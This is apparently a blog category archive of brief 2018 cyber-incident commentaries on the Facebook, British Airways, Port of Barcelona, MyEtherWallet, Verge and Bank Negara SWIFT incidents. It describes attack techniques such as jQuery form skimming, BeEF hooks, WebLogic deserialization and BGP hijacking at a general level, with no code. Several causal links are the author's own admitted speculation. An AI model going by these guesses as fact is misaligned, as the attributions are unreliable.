Category Archives: cyber security incident news highlight

2018, cyber security incident news highlight

An attack on media platform causes exposed nearly 50 million user informations – Sep 2018

In 80’s our daily life without any electronic type social media involves. But we understood that we are avoid to talk to the stranger. As time goes by, internet social media fine tune our mind. As a result we make friend and relies on this communication platform.

Since this is a popular open platform. It is hard to avoid scam activities. As a result, the risk factor will growth in such circumstances. Even though you have security awareness . But who can garantee the threat actor only focus to attack the indiviual instead of the social media vendor.

Back in October 2016, the memcached developers fixed three remote code execution vulnerabilities (CVE-2016-8704, CVE-2016-8705 and CVE-2016-8706). The flaws affected memcached’s binary protocol for storing and retrieving data and one of them was in the Simple Authentication and Security Layer (SASL) implementation.

Remark: CVE-2016-8704 – An integer overflow in the process_bin_append_prepend function in Memcached, which is responsible for processing multiple commands of Memcached binary protocol, can be abused to cause heap overflow and lead to remote code execution.

Do you think the data breaches announced by Facebook yesterday whether it happen earlier last year but nobody know?

Related news – https://www.forbes.com/sites/thomasbrewster/2018/09/29/how-facebook-was-hacked-and-why-its-a-disaster-for-internet-security/#74855f792033

cyber security incident news highlight, Under our observation

Hypothesis – About the cyber attack on Port of Barcelona (Sep 2018)

We heard that the Port of Barcelona suffers an attack of hackers last week (20th Sep 2018). The logistics and transportation industry lure hackers’ interest because they can extort ransom.

There is no official or incident details announcement till today. The following details merely my personal imagination of this incident. Any resemblance to actual events or persons is entirely coincidental.

We noticed that Portic Barcelona uses WebLogic for Private PaaS in 2014. The solution aim to enhance the performance and facilitates interaction between its members through its information services to logistics agents and other customers.

What if below vulnerability occurs, do you think the scenario whether will have similarity to the incident.

ORACLE WEBLOGIC SERVER JAVA DESERIALIZATION REMOTE CODE EXECUTION VULNERABILITY (CVE-2018-2628) BYPASS

Headline News article for reference.

https://www.portseurope.com/barcelona-port-suffers-a-cyber-attack/

2018, Application Development, Data privacy

Consider how does JQuery affect millions of people confidential data – Sep 2018

RiskIQ expose one of the possible way how hacker steal customer credit card data of British Airline. Expert speculate the suspects exploit Inject jQuery into a page technique collect the confidential data. BA claim that the data breach only occurs in credit card data.
Risk IQ share the proof of concept shown that the technique equilvalent ATM machine skimmer. But this round the skimmer feature is install on web page. The fact is that when victim click the specific compromise web page button. The personal data belongs to victim will divert to hacker server.
Perhaps we know the technique so called Inject jQuery into a page is not a news. But exploit inject jQuery technique cope with ATM machine skimmer concept may be is new.
I am not going to copy RiskIQ POC programming language this time. However I will display the inject jQuery sample code for your reference. Meanwhile I will let your memory awaken.

BeEF, the Browser Exploitation Framework, is a testing tool designed to enable penetration testers to launch client-side attacks against target browsers.
The BeEF hook is a JavaScript file hosted on the BeEF server that needs to run on client browsers. When it does, it calls back to the BeEF server communicating a lot of information about the target. So this is another possibility let British Airways lost the customer data.

cyber security incident news highlight, Under our observation

British Airway announcement – 7th Sep 2018 (380,000 customers’ bank details stolen from website)

The Spokesman of British Airways said around 380,000 payment cards had been compromised and it had notified the police.He stated that they suspected that hacker stolen customers’ bank details through official website and or mobile apps. However the stolen data didn’t include travel or passport details.

If there is european citizens become a victims of this incident. The penalty is that it can lead to fines of up to 20 million euros or 4% of the total worldwide annual turnover of the preceding financial year, whichever is higher. Official announcement shown as below:

https://www.britishairways.com/en-hk/information/incident/data-theft/latest-information?dr=&dt=British%20Airways&tier=&scheme=&logintype=public&audience=travel&CUSTSEG=&GGLMember=&ban=%7C%7CP1M%7C%7C%7C%7C%7C%7C%7CHOME%7C%7C%7C%7CL4%7C%7C%7C%7Canonymous-inspiration%7C%7C%7C&KMtag=c&KMver=1.0&clickpage=HOME

2018, cyber security incident news highlight

Aug 2018 – Malware (KEYMARBLE)

My friend informed that a new malware wreak havoc. Meanwhile US-Cert issued the technical articles described the details and let’s the world staying alert! US-CERT also provides the Indicator of compromise (IOC) file for reference. I am interested and therefore I put the this file into the sandbox see whether what exact issue will be happened. The facts is that threat actor embedded malicious code lure victim to open this document. The overall procedure similar word document ask you to excecute a XML contents. The whole procedure may not be trigger the antivirus alert (antivirus may detect this issue now, but not absolute sure) till the infection stage go to phase two. Yes, download a malicious executable file. If similar scenario happen in your company, sounds like you IT campus has a cat doing the monitoring. The cat will catch the mouse once he appears. How does your cat know this Rat appear. All relies on Yara rule (see attached diagram for reference). May be people will be scared of the web page contains hyperlink on top. And therefore this time not provided.

–End–

cyber security incident news highlight, Public safety, Under our observation, Virus & Malware

New version of black energy cyber attack target Microsoft OLE product design weakness

Ukrainian intel agency has claimed it stopped a cyber attack against a chlorine plant that was launched using the notorious VPNFilter malware. Perhaps the world focusing VPN filter malware spreading and infection. We known earlier last month that such attack targets are the low end wireless router and network access storage (NAS).

However, from my point of view is that the main stream of the cyber attack so far happening not limit to this incident. The fact is that lure the attacker interest to do the re-engineering of their attacks seems maintain on Microsoft office product. What is the key component? Yes, it is OLE objective linking and embedding. Or you may say, if I am following Microsoft patch Tue remediation schedule it will be safe. It looks correct. But normal RTF file, it was able to avoid detection by many security products. And therefore attacker conduct similar hacking technology to execute cyber attack in Ukrainian. The political situation of Ukrainian given a never ending story. Meanwhile the world never without using MS office document!

Reference:

Headlines news – Ukraine claims it blocked VPNFilter attack at chemical plant : https://www.theregister.co.uk/2018/07/13/ukraine_vpnfilter_attack/

My speculation on how Cisco (Talos) found the malware (VPNFilter malware)

My speculation on how Cisco (Talos) found the malware (VPNFilter malware).

 

Blockchain, cyber security incident news highlight

Hackers jailbreak MyEtherWallet Infrastructure (Apr 2018)

ISPs tend to restrict what an end customer can advertise. However, any ISP do not filter customer advertisements.
A possible factor let’s hacker compromise the customer router thus advertise errant information into the global routing table.

An attackers stolen at least $13,000 in Ethereum within two hours.

Security expert speculate that it is a DNS attack. But many attack method can be used. For example: BGP hijacking. The scenario displayed on above diagram.

Headline news shown as below:

https://www.theverge.com/2018/4/24/17275982/myetherwallet-hack-bgp-dns-hijacking-stolen-ethereum

 

 

 

 

 

 

2018, Blockchain, cyber security incident news highlight

Verge Is Forced to Fork After Suffering a 51% Attack

Blockchain technology contains advanced security features fundamentally. However the heist occurs in such secure platform are in frequent. The questions of a retrospective and why was hacked? It proof that the problem not given by blockchain technology design flaw. Most likely the root causes are given by end point (client side), operation management (show the privilesge credential in the system event log). Rumors happened yesterday, verge user feared the attacker might use his dominant network position to siphon funds from their accounts. Verge technical team announce that it is a hash attack and it only some blocks were affected during a 3 hour period, not 13 hours. But what do you think? Do you think there is a zero day happens in e-wallet? Headline News can be found in following url.

https://news.bitcoin.com/verge-is-forced-to-fork-after-suffering-a-51-attack/

2018, cyber security incident news highlight, Under our observation

Bank Negara Malaysia (Bank) detected and foiled a cybersecurity incident involving attempted unauthorized fund transfers using falsified SWIFT messages.

3 Comments

Easter holiday make me lazy. Seen cyber incident alert posted by my friend Enoch yesterday. However I just ignore until awaken this evening. The details of this incident was that the crooks use falsified SWIFT Messages try to achieve their goal. The news told that they haven’t successful. As far as I remember, on February this year City Union Bank in India victim of cyber hack through SWIFT system. My speculation is that it is the flaw of MT202. A fundamental design limitation on original MT 202 message. Perhaps MT 202 COV doing the compensated control. But the MT 202 COV must not be used for any other interbank transfer. However MT 202 still valid and not end of life yet. A hints input of technical concerns shown on attach picture see whether this is root causes of this incident.

MT 202 design weakness lure financial crime

i. Suspicious activity monitoring on the underlying originator and beneficiary in the message would not be performed.

ii. The originating bank could be in a jurisdiction with different sanction watch lists and the technical capabilities of each bank’s sanction screening program could vary.

Below url is the press release (Cybersecurity Incident Involving the Use of Falsified SWIFT Messages)

http://www.bnm.gov.my/index.php?ch=en_press&pg=en_press&ac=4651

Reference:

City Union Bank in India victim of cyber hack through SWIFT system – Reuters Headline News (19th Feb 2018)

 

2018, cyber security incident news highlight

How much is your personal data worth?

Microsoft windows defender make the world safe. The threat actor masquerading a legitimate file goal to doing bitcoin mining. Windows defender just kill it within seconds. It is very powerful. It hints to the world that there will be formed different countries will have their own operation system. Why? Nobody want that all the time under monitoring.

For more details, about this news, please refer below url for reference.

https://www.forbes.com/sites/leemathews/2018/03/08/microsoft-saves-400000-windows-users-from-a-malicious-cryptocoin-miner/#5cc0f2b046a6